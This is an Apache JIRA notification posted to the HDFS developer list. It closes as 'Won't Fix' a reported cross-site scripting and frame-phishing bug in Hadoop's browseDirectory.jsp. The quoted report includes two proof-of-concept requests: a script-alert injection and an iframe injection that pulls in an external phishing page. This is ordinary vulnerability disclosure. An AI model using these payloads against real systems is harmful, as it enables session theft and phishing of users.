You are viewing a plain text version of this content. The canonical link for it is here.
Posted to hdfs-dev@hadoop.apache.org by "Vivek Ganesan (JIRA)" <ji...@apache.org> on 2014/02/05 14:56:10 UTC

[jira] [Resolved] (HDFS-4901) Site Scripting and Phishing Through Frames in browseDirectory.jsp

     [ https://issues.apache.org/jira/browse/HDFS-4901?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Vivek Ganesan resolved HDFS-4901.
---------------------------------

    Resolution: Won't Fix

Refer: http://mail-archives.apache.org/mod_mbox/hadoop-hdfs-dev/201308.mbox/%3CCADdVdVHYSnXOxUB2t8kKnwATA8QYg6z4ycWJmcAWQahwEyupdw@mail.gmail.com%3E

Closing this issue as "Won't fix"

> Site Scripting and Phishing Through Frames in browseDirectory.jsp
> -----------------------------------------------------------------
>
>                 Key: HDFS-4901
>                 URL: https://issues.apache.org/jira/browse/HDFS-4901
>             Project: Hadoop HDFS
>          Issue Type: Bug
>          Components: security, webhdfs
>    Affects Versions: 1.2.1
>            Reporter: Jeffrey E  Rodriguez
>            Assignee: Vivek Ganesan
>            Priority: Blocker
>         Attachments: HDFS-4901.patch, HDFS-4901.patch.1
>
>   Original Estimate: 24h
>          Time Spent: 24h
>  Remaining Estimate: 0h
>
> It is possible to steal or manipulate customer session and cookies, which might be used to impersonate a legitimate user,
> allowing the hacker to view or alter user records, and to perform transactions as that user.
> e.g.
> GET /browseDirectory.jsp? dir=%2Fhadoop'"/><script>alert(759)</script> &namenodeInfoPort=50070
> Also;
> Phishing Through Frames
> Try:
> GET /browseDirectory.jsp? dir=%2Fhadoop%27%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E
> &namenodeInfoPort=50070 HTTP/1.1
> Cookie: JSESSIONID=qd9i8tuccuam1cme71swr9nfi
> Accept-Language: en-US
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;



--
This message was sent by Atlassian JIRA
(v6.1.5#6160)